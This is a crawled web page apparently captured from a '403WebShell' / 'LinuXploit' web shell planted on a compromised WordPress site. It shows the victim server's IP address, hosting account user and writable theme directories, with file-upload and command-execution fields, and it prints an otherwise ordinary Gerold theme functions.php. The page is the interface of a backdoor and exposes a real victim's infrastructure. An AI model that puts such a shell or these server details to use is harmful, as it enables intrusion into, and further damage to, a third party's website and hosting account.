Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.135.202.168
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/cynthiaadediran.com/wp-content/themes/gerold/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/cynthiaadediran.com/wp-content/themes/gerold/functions.php
<?php

/**
 * Gerold Theme functions and definitions.
 *
 * @link https://developer.wordpress.org/themes/basics/theme-functions/
 *
 * @package Gerold_Theme
 * @since Gerold 1.0.0
 * @author ThemeJunction 
 */

/**
 *---------------------------------------------------------------------------------------
 * Define constants
 *---------------------------------------------------------------------------------------
 */
define('GEROLD_THEME_NAME', 'Gerold');
define('GEROLD_THEME_SLUG', 'gerold');

define('GEROLD_THEME_VERSION', '1.1.2');

define('GEROLD_THEME_DIR', get_template_directory());
define('GEROLD_THEME_URL', get_template_directory_uri());
define('GEROLD_STYLESHEET_URL', get_stylesheet_uri());

define('GEROLD_INC_DIR', GEROLD_THEME_DIR . '/inc');
define('GEROLD_INC_URL', GEROLD_THEME_URL . '/inc');

define('GEROLD_COMMON_DIR', GEROLD_THEME_DIR . '/inc/common');
define('GEROLD_COMMON_URL', GEROLD_THEME_URL . '/inc/common');

define('GEROLD_CUSTOMIZER_DIR', GEROLD_INC_DIR . '/customizer/');

define('GEROLD_TEMPLATE_PARTS', GEROLD_THEME_DIR . '/template-parts/');

define('GEROLD_ASSETS_DIR', GEROLD_THEME_DIR . '/assets');
define('GEROLD_ASSETS_URL', GEROLD_THEME_URL . '/assets');

define('GEROLD_ASSETS_CSS_DIR', GEROLD_THEME_DIR . '/assets/css/');
define('GEROLD_ASSETS_CSS_URL', GEROLD_THEME_URL . '/assets/css/');

define('GEROLD_ASSETS_JS_DIR', GEROLD_THEME_DIR . '/assets/js/');
define('GEROLD_ASSETS_JS_URL', GEROLD_THEME_URL . '/assets/js/');

define('GEROLD_ASSETS_IMAGES_DIR', GEROLD_THEME_DIR . '/assets/images');
define('GEROLD_ASSETS_IMAGES_URL', GEROLD_THEME_URL . '/assets/images');

/**
 * ---------------------------------------------------------------------------------------
 * Template Hooks
 * ---------------------------------------------------------------------------------------
 */
require_once GEROLD_INC_DIR . '/template-hooks.php';

/**
 * ---------------------------------------------------------------------------------------
 * Template Helpers
 * ---------------------------------------------------------------------------------------
 */
require_once GEROLD_INC_DIR . '/template-helpers.php';

/**
 * ---------------------------------------------------------------------------------------
 * TGM Include
 * ---------------------------------------------------------------------------------------
 */
require_once GEROLD_INC_DIR . '/lib/class-tgm-plugin-activation.php';
require_once GEROLD_INC_DIR . '/lib/tgm-config.php';

/**
 * ---------------------------------------------------------------------------------------
 * Theme Customizer
 * ---------------------------------------------------------------------------------------
 */
require_once GEROLD_INC_DIR . '/lib/class-kirki-customizer.php';
require_once GEROLD_CUSTOMIZER_DIR . 'customizer-config.php';

/**
 * ---------------------------------------------------------------------------------------
 * Include Files
 * ---------------------------------------------------------------------------------------
 */
require_once GEROLD_INC_DIR . '/template-functions.php';

require_once GEROLD_INC_DIR . '/lib/class-navwalker.php';

if (defined('JETPACK__VERSION')) {
  require_once GEROLD_INC_DIR . '/jetpack.php';
}

Youez - 2016 - github.com/yon3zu
LinuXploit